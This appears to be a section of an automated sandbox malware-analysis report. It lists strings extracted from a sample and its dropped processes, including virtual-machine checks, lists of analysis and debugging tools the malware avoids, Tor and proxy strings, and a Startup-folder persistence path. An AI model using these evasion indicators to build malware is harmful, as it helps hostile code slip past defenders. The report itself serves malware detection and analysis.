Source: dialer.exe, 00000022.00000003.2676951813.000001B8F6BEA000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2664346245.000001B8F60EB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2700365073.000001B8F6BEB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2656550735.000001B8F6BA9000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2674217780.000001B8F6BEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: XC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
Source: dialer.exe, 00000022.00000003.2203687364.000001B8F6310000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservi
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: ddrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.)
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: rayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\Def
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad allocCountbad record MACbad restart PCbad span statebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removederror responsefile too largefinalizer waitgcstoptheworldget uptime: %wgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedmemprofileratemultipartfilesneed more datanil elem type!no module datano such deviceopen event: %wparse cert: %wprotocol errorread certs: %wread_frame_eofreflect.Value.remove app: %wruntime: full=runtime: want=s.allocCount= semaRoot queueserver.versionstack overflowstart task: %wstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriodtoo many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: entersyscallexit status failed to %wfound av: %sgcBitsArenasgcpacertracegetaddrinfowgot TI tokenguid_machineharddecommithost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid pathinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsmheapSpecialmsftedit.dllmspanSpecialnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wproxyconnectrandautoseedrecv_goaway_reflect.Copyreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerContent-RangeDONT-FRAGMENTDeleteServiceDestroyWindowDistributorIDECDSAWithSHA1EnumProcessesExitWindowsExFQDN too longFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGeoIPFile %s
Source: 5A58.exe, 0000001F.00000003.2559906018.0000000003760000.00000004.00000800.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2518549986.0000000003760000.00000004.00000800.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2547050793.0000000003760000.00000004.00000800.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2501856958.0000000003760000.00000004.00000800.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2530136198.0000000003760000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qemu-ga.exep
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: 5A58.exe, 0000001F.00000003.2518407469.0000000003061000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2453113874.0000000003760000.00000004.00000800.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2501733907.0000000003061000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2529972627.0000000003061000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2559608061.0000000003061000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2444930302.0000000003760000.00000004.00000800.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2464146754.0000000003760000.00000004.00000800.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2546743834.0000000003061000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2676951813.000001B8F6BEA000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2750963859.000001B8F60D3000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2704944546.000001B8F60CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qemu-ga.exe
Source: explorer.exe, 00000001.00000000.1678371754.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1678371754.000000000982D000.00000004.00000001.00020000.00000000.sdmp, InstallSetup8.exe, 0000000D.00000002.3184690905.000000000072E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.2357230523.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.2357230523.0000000000F1A000.00000004.00000020.00020000.00000000.sdmp, etopt.exe, 0000001A.00000003.2724141232.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, etopt.exe, 0000001A.00000003.2722293570.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, etopt.exe, 0000001A.00000003.2715772842.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, etopt.exe, 0000001A.00000003.2698483005.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, etopt.exe, 0000001A.00000003.2432796920.0000000000611000.00000004.00000020.00020000.00000000.sdmp, etopt.exe, 0000001A.00000003.2703850061.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: ersexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindo
Source: explorer.exe, 00000001.00000000.1678877652.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2416198321.00000000029D5000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: 11VBoxSFWINDIRWD
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: pclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo
Source: dialer.exe, 00000022.00000003.2750963859.000001B8F60D3000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2704944546.000001B8F60CE000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2700493104.000001B8F60CB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2723023170.000001B8F60D3000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2713011554.000001B8F60CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeqNMTWEVNNjozGDKXokccvYQzoVj.exeC:\Program Files (x86)\zRldtbaVCHHXnHJyftZOBzesBDzjDlWlCDCFlQkqeNfVJTNPArJoRxzWfMsJsmcUmoOaAMEPtJXBDaO\qNMTWEVNNjozGDKXokccvYQzoVj.exeRegSvcs.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeInstallSetup8.exeC:\Users\user\AppData\Local\Temp\InstallSetup8.exeBroomSetup.exeC:\Users\user\AppData\Local\Temp\BroomSetup.exetuc4.exeC:\Users\user\AppData\Local\Temp\tuc4.exetuc4.tmpC:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmpetopt.exeC:\Users\user\AppData\Local\Temp\etopt.exetuc4.exeC:\Users\user\AppData\Local\Temp\tuc4.exetuc4.tmpC:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmpnsi4BEF.tmp.exeC:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe5A58.exeC:\Users\user\AppData\Local\Temp\5A58.exedialer.exeC:\Windows\System32\dialer.exe7D14.exeC:\Users\user\AppData\Local\Temp\7D14.exe9234.exeC:\Users\user\AppData\Local\Temp\9234.exeA203.exeC:\Users\user\AppData\Local\Temp\A203.exeABF7.exeC:\Users\user\AppData\Local\Temp\ABF7.exevghrjtaC:\Users\user\AppData\Roaming\vghrjtaxQfUeydaBrjuHptx.exeC:\ProgramData\xQfUeydaBrjuHptx.exedatapumpcrt.exeC:\Program Files (x86)\DataPumpCRT\datapumpcrt.exeqemu-ga.exeC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeWmiPrvSE.exexQfUeydaBrjuHptx.exeC:\ProgramData\xQ
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2416198321.00000000029D5000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: aryvmcixn-SR-%W
Source: explorer.exe, 00000001.00000000.1678877652.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1676755416.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000001.00000000.1678371754.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: rSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)
Source: tuc4.tmp, 00000018.00000002.3181148622.000000000060E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yB
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerArabicAugustBUTTONBasic BitBltBrahmiCANCELCONIN$CancelCarianChakmaCommonCookieCopticExpectFltMgrFormatFridayGOAWAYGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLengthLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: and got= max= ms, ptr tab= top=%s %q%s %s%s%d%s/%s%s:%d%s=%s"'&+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.250001500025000350004500055000650512560015600278125:**@:path<nil>AdlamAprilBamumBatakBuhidCall ClassCountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNONCENushuOghamOriyaOsageP-224P-256P-384P-521PGDSEREALMRangeRealmRunicSHA-1STermTakriTamilTypeAUSTARUUID=\u202] = (allowarrayatimebad nchdirchmodclosecsrssctimedeferfalsefaultfilesfloatgcinggeoipgnamegscanhchanhostshttpsimap2imap3imapsinit int16int32int64matchmheapmkdirmonthmtimentohspanicparsepgdsepop3sproxyrangermdirrouterune scav schedsdsetsleepslicesockssse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...)
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2416198321.00000000029D5000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: tVMSrvcs\|!
Source: explorer.exe, 00000001.00000000.1678371754.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1675217298.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthoritiesbad addressbad argSizebad m valuebad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcreated by crypt32.dlle2.keff.orgembedded/%sexternal IPfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknameglobalAllochttp2clienthttp2serverhttps_proxyi/o timeoutlocal errormSpanManualmethodargs(minTrigger=move %s: %wmswsock.dllnetpollInitnext servernil contextopera-proxyorannis.comout of syncparse errorprocess: %sreflect.SetreflectOffsretry-afterruntime: P runtime: g runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writestack tracestart proxytaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion.dllversion=195wininet.dllwup_process (sensitive) B (
Source: InstallSetup8.exe, 0000000D.00000002.3184690905.000000000070C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: ermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max= ms, ptr tab= top=%s %q%s
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: sse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max= ms, ptr tab= top=%s %q%s %s%s*%d%s/%s%s:%d%s=%s"'&+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.2500
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: SafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthorities
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: vmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ... exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: ><'\'') = ) m=+Inf-Inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0x%x1.1110803125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00
Source: etopt.exe, 0000001A.00000002.2798326413.0000000004F30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .?AVCZwProcessesGetCallback@?1??IsRunningInVmwareByProcessList@@YAHXZ@
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: rdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying=
Source: dialer.exe, 00000022.00000003.2713011554.000001B8F60C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&0
Source: 907.exe, 00000006.00000002.1919407201.00000000044A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: -aV( Loopback )\|(TAP-?)\|(TEST)\|(VPN)\|(Remote )^(Microsoft Hyper-V Network Adapter\|USB \|Targus)
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog
Source: RegSvcs.exe, 00000008.00000002.3182406330.0000000000F42000.00000004.00000020.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2399976022.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2416198321.00000000029D5000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: \\.\HGFS`
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: lUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Window
Source: explorer.exe, 00000001.00000000.1676755416.00000000078A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1678371754.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: PalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:
Source: explorer.exe, 00000001.00000000.1678877652.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: etopt.exe, 0000001A.00000002.2798326413.0000000004F30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SnifferPro.exeCharles.exeIris.exeHTTPDebuggerPro.exeSRSniffer.exeOstinato.exeWPE.exeWSockExpert_cn.exeWSockExpert.exeSmartSniff.exehookMe.exeNetworkTrafficView.exetcpmon.exesmsniff.exeHttpAnalyzerStdV7.exeHttpAnalyzerStdV6.exeHttpAnalyzerStdV5.exeHttpAnalyzerStdV4.exeCsnas.exeOllyIce.exeOllyDbg.exeWinDbg.exeSoftIce.exeWireshark.exeFiddler.exe%08X%08XROOT\WMIMSSMBios_RawSMBiosTablesSMBiosDataNull StringVirtualvirtualpackIdmidsidmac1mac2boardmanusnproductcpunamecoreNumsysmajorminorbuildreleasex64notepadvmadminpowerOnlocaleSoftware\ChromiumlocInfostsdquerylocationcountryprovincecityispcountylonlatcltInfoinstcandenyAppKeydenyAppssuccneedRespuninstappactiveSoftware\Baidu\BDLOGcur_versionvmtoolsd.exewmacthlp.exeC:\XWsgczyjbr(%XhuX%huX%hu)
Source: dialer.exe, 00000022.00000003.2203687364.000001B8F6310000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ...
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: swsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAccepted
Source: explorer.exe, 00000001.00000000.1675217298.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000

Source: C:\Users\user\AppData\Local\Temp\907.exe	API call chain: ExitProcess graph end node	graph_6-69085
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\W73PCbSH71.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\W73PCbSH71.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

